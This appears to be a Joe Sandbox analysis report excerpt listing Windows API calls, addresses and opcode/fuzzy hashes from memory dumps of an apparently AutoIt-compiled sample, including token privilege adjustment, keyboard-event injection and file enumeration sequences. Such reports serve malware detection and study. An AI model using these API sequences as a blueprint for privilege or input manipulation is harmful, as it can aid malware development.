                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 5baf2cdce66f128cdace788158d65d97239d8c1384857546bba21fda41ed313c
                                                                                                                    • Instruction ID: f8d839b4431e2f4912c662b3a1cc6b83de7eeec7cb084460ae3fc9e705f622b5
                                                                                                                    • Opcode Fuzzy Hash: 5baf2cdce66f128cdace788158d65d97239d8c1384857546bba21fda41ed313c
                                                                                                                    • Instruction Fuzzy Hash: 7A210674528341DFCB15DF24C484B5ABBE1BF88354F058968E98957722D731E825CF52
                                                                                                                    APIs
                                                                                                                    • __lock_file.LIBCMT ref: 002D48A6
                                                                                                                      • Part of subcall function 002D8B28: __getptd_noexit.LIBCMT ref: 002D8B28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2597487223-0
                                                                                                                    • Opcode ID: 72dda7e37410967f7d6b540990ab9e67be4e803833a28c631ce9769652632fdd
                                                                                                                    • Instruction ID: 1d5d7d622a488fe01eb916bce255e774a785e193920b7454afacc6f0f324dc48
                                                                                                                    • Opcode Fuzzy Hash: 72dda7e37410967f7d6b540990ab9e67be4e803833a28c631ce9769652632fdd
                                                                                                                    • Instruction Fuzzy Hash: A7F08C31920649ABDB11BFA48C0A7EE36A1AF00365F158416F4249A391CBB88D71EF51
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,?,003752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002B4E7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 14a2bbc901af08f22cc0ffd0dd7a4925c36f7b1a31e2a8b6a88715f24d4525e5
                                                                                                                    • Instruction ID: f5197bacc5d35359a1860f7279f8622f0a339680ab6520d8a82c0f65db8d257c
                                                                                                                    • Opcode Fuzzy Hash: 14a2bbc901af08f22cc0ffd0dd7a4925c36f7b1a31e2a8b6a88715f24d4525e5
                                                                                                                    • Instruction Fuzzy Hash: CCF03071525712CFCB34AF64E4D4852B7E5BF143A5310897EE2D782612C771D860DF40
                                                                                                                    APIs
                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002D07B0
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2514874351-0
                                                                                                                    • Opcode ID: b9793669a6c5738e00df80355d6b605f12dfa53ba411f582f3afa62674764bfc
                                                                                                                    • Instruction ID: 5d3bb3973b3c51ddac301808e5c6694e057dd03875531db7e7d780b0e71eee92
                                                                                                                    • Opcode Fuzzy Hash: b9793669a6c5738e00df80355d6b605f12dfa53ba411f582f3afa62674764bfc
                                                                                                                    • Instruction Fuzzy Hash: DEE0CD369441285BC721D6699C06FEA77DDDFC87A0F0441B5FC0CD7245D9749C908AD0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2638373210-0
                                                                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                    • Instruction ID: d8ba5db75cb11eea91316792a1b764b234495a6109125a908b78675982468122
                                                                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                    • Instruction Fuzzy Hash: 7DE092B0104B005BD7398B24D840BE377E1AB09304F00091DF2AA83241EBA278818B5D
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 01169223
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                    • Instruction ID: a0f5ce0ce368fac9b413c7a2f23c960165b893922a3442e963c36f5c7effc6f7
                                                                                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                    • Instruction Fuzzy Hash: 48E08C3090620CEFDB18CEA8C904AA973BCAB04324F004658A906C3280D6328A20D659
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 011691F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                    • Instruction ID: 053b0cd8a3562d0ec0f316cc8e1c9ab0f1275da171af58f4bf75bb10b2b83c9f
                                                                                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                    • Instruction Fuzzy Hash: 1AD05E3090520CABCB14CAA899089DA77ACA705324F004758E92583280D63299109754
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wfsopen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 197181222-0
                                                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction ID: 8a50c8b4b281a8c5670881afba95169e2a5b0751e143bafe0981abcd70c24cd1
                                                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction Fuzzy Hash: CBB0927644020C77CE012A82EC02A493B199B41764F408021FF0C18262E6B3AA789A89
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 0116ABF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction ID: 58b720ccab091c2881db11d8da61d73ef31fe752264c4beb8e97148ee9beb614
                                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction Fuzzy Hash: 82E0BF7494010DEFDB00DFA4D6496DD7BB4EF04302F1005A1FD05E7681DB319E648A62
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 0116ABF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction ID: e525beb7634dd8903a6edc0b36ff4ca10b4122a846bee274fae5e37148c9dfcc
                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction Fuzzy Hash: A1E0E67494010DDFDB00DFB4D64969D7BB4EF04302F100161FD01E2281D7319D608A72
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0033CB37
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0033CB95
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0033CBD6
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0033CC00
                                                                                                                    • SendMessageW.USER32 ref: 0033CC29
                                                                                                                    • _wcsncpy.LIBCMT ref: 0033CC95
                                                                                                                    • GetKeyState.USER32(00000011), ref: 0033CCB6
                                                                                                                    • GetKeyState.USER32(00000009), ref: 0033CCC3
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0033CCD9
                                                                                                                    • GetKeyState.USER32(00000010), ref: 0033CCE3
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0033CD0C
                                                                                                                    • SendMessageW.USER32 ref: 0033CD33
                                                                                                                    • SendMessageW.USER32(?,00001030,?,0033B348), ref: 0033CE37
                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0033CE4D
                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0033CE60
                                                                                                                    • SetCapture.USER32(?), ref: 0033CE69
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0033CECE
                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0033CEDB
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0033CEF5
                                                                                                                    • ReleaseCapture.USER32 ref: 0033CF00
                                                                                                                    • GetCursorPos.USER32(?), ref: 0033CF3A
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0033CF47
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0033CFA3
                                                                                                                    • SendMessageW.USER32 ref: 0033CFD1
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0033D00E
                                                                                                                    • SendMessageW.USER32 ref: 0033D03D
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0033D05E
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0033D06D
                                                                                                                    • GetCursorPos.USER32(?), ref: 0033D08D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0033D09A
                                                                                                                    • GetParent.USER32(?), ref: 0033D0BA
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0033D123
                                                                                                                    • SendMessageW.USER32 ref: 0033D154
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0033D1B2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0033D1E2
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0033D20C
                                                                                                                    • SendMessageW.USER32 ref: 0033D22F
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0033D281
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0033D2B5
                                                                                                                      • Part of subcall function 002B25DB: GetWindowLongW.USER32(?,000000EB), ref: 002B25EC
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0033D351
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                    • String ID: @GUI_DRAGID$F$pb7
                                                                                                                    • API String ID: 3977979337-3134611142
                                                                                                                    • Opcode ID: feff5d22ee0b7d45502e15b8a09392972758c77994fc2f52927b5d3510cee835
                                                                                                                    • Instruction ID: f48a8632eb7ab44306b48ddd4ea156c6f27dc8dec0e1059ce4e3b887c8844c5d
                                                                                                                    • Opcode Fuzzy Hash: feff5d22ee0b7d45502e15b8a09392972758c77994fc2f52927b5d3510cee835
                                                                                                                    • Instruction Fuzzy Hash: C542CC34614340AFDB26CF24C885EAABBE9FF49310F141A19F699A72B0C771D850DF92
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memset
                                                                                                                    • String ID: ]6$3c,$DEFINE$P\6$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_,
                                                                                                                    • API String ID: 1357608183-2105160573
                                                                                                                    • Opcode ID: d0649391f0857d486cf4c9016aeb22ae0a9443d1bf92b9139e6ceee66f4000b4
                                                                                                                    • Instruction ID: cc328107a72b4452adfef1562560db7fa9363ef2afa95b841b289f1410cb42a8
                                                                                                                    • Opcode Fuzzy Hash: d0649391f0857d486cf4c9016aeb22ae0a9443d1bf92b9139e6ceee66f4000b4
                                                                                                                    • Instruction Fuzzy Hash: 9793C271E1121ADFDB25CF98C891BADB7B5FF48310F25816AE945AB2C1E7709E81CB40
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 002B48DF
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002ED665
                                                                                                                    • IsIconic.USER32(?), ref: 002ED66E
                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 002ED67B
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 002ED685
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002ED69B
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002ED6A2
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 002ED6AE
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 002ED6BF
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 002ED6C7
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 002ED6CF
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 002ED6D2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002ED6E7
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002ED6F2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002ED6FC
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002ED701
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002ED70A
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002ED70F
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002ED719
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002ED71E
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 002ED721
                                                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 002ED748
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                    • Opcode ID: f218fdc832fdf2d81a94fc3e10ca160f02d9d98d7ab45062f7747ad8a932322f
                                                                                                                    • Instruction ID: c3fd9d13630059dacd24ac7480a5ad0900a3da775d6c548e7edb5d1ba1c9d407
                                                                                                                    • Opcode Fuzzy Hash: f218fdc832fdf2d81a94fc3e10ca160f02d9d98d7ab45062f7747ad8a932322f
                                                                                                                    • Instruction Fuzzy Hash: 2E315571E903587FEB216F629C8AF7F7E6CEB44B50F504025FA04EA1E1C6B05D11ABA1
APIs
  • Part of subcall function 003087E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0030882B
  • Part of subcall function 003087E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00308858
  • Part of subcall function 003087E1: GetLastError.KERNEL32 ref: 00308865
• _memset.LIBCMT ref: 00308353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003083A5
• CloseHandle.KERNEL32(?), ref: 003083B6
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003083CD
• GetProcessWindowStation.USER32 ref: 003083E6
• SetProcessWindowStation.USER32(00000000), ref: 003083F0
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0030840A
  • Part of subcall function 003081CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00308309), ref: 003081E0
  • Part of subcall function 003081CB: CloseHandle.KERNEL32(?,?,00308309), ref: 003081F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: fcdecfbeabaaeb84fb17bd485f6e5b0b8c64da7856ff00eb431618ea56122dda
• Instruction ID: 8ef14f93578d7cae23f2d5306803615b4254f4447bca15e8c7cadea8eaeb1d1d
• Opcode Fuzzy Hash: fcdecfbeabaaeb84fb17bd485f6e5b0b8c64da7856ff00eb431618ea56122dda
• Instruction Fuzzy Hash: 98817CB1D02209AFDF12DFA5CC95AEE7BB9FF05308F144169F954A62A1DB318E14DB20
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0031C78D
• FindClose.KERNEL32(00000000), ref: 0031C7E1
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0031C806
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0031C81D
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0031C844
• __swprintf.LIBCMT ref: 0031C890
• __swprintf.LIBCMT ref: 0031C8D3
  • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
• __swprintf.LIBCMT ref: 0031C927
  • Part of subcall function 002D3698: __woutput_l.LIBCMT ref: 002D36F1
• __swprintf.LIBCMT ref: 0031C975
  • Part of subcall function 002D3698: __flsbuf.LIBCMT ref: 002D3713
  • Part of subcall function 002D3698: __flsbuf.LIBCMT ref: 002D372B
• __swprintf.LIBCMT ref: 0031C9C4
• __swprintf.LIBCMT ref: 0031CA13
• __swprintf.LIBCMT ref: 0031CA62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 3953360268-2428617273
• Opcode ID: b1fdf0fbbf3fc2501c7642537b0cb5b503617044ed8ab0891a88be00fcce5e34
• Instruction ID: a78abd15ea064292383a745422fed9480ede189037212ac6c570cc6e0b76c9d0
• Opcode Fuzzy Hash: b1fdf0fbbf3fc2501c7642537b0cb5b503617044ed8ab0891a88be00fcce5e34
• Instruction Fuzzy Hash: 0DA13CB2418205ABC705EFA4C886DEFB7ECEF99744F400919F595C6191EB30EA58CB62
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0031EFB6
• _wcscmp.LIBCMT ref: 0031EFCB
• _wcscmp.LIBCMT ref: 0031EFE2
• GetFileAttributesW.KERNEL32(?), ref: 0031EFF4
• SetFileAttributesW.KERNEL32(?,?), ref: 0031F00E
• FindNextFileW.KERNEL32(00000000,?), ref: 0031F026
• FindClose.KERNEL32(00000000), ref: 0031F031
• FindFirstFileW.KERNEL32(*.*,?), ref: 0031F04D
• _wcscmp.LIBCMT ref: 0031F074
• _wcscmp.LIBCMT ref: 0031F08B
• SetCurrentDirectoryW.KERNEL32(?), ref: 0031F09D
• SetCurrentDirectoryW.KERNEL32(00368920), ref: 0031F0BB
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0031F0C5
• FindClose.KERNEL32(00000000), ref: 0031F0D2
• FindClose.KERNEL32(00000000), ref: 0031F0E4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
